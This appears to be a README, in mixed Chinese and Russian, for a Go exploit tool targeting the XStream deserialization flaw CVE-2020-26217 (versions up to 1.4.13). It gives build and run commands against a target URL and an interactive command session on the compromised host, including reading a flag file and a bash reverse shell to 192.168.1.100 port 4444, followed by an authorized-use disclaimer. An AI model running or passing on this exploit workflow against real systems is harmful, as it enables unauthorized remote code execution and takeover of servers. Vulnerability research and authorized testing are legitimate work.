
CVE-2020-26217 XStream反序列化的poc
Инструмент для эксплуатации уязвимости удаленного выполнения кода XStream.
CVE-2020-26217 — это уязвимость десериализации в библиотеке XStream, которая позволяет злоумышленнику выполнить удаленный код путем создания вредоносных XML-данных.
Затронутые версии: XStream <= 1.4.13
go run poc.go <目标URL>
# 运行工具
go run poc.go http://target.com:8080/?data
# 进入交互模式后输入命令
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования. Не используйте его в незаконных целях. Пользователь несет полную юридическую ответственность.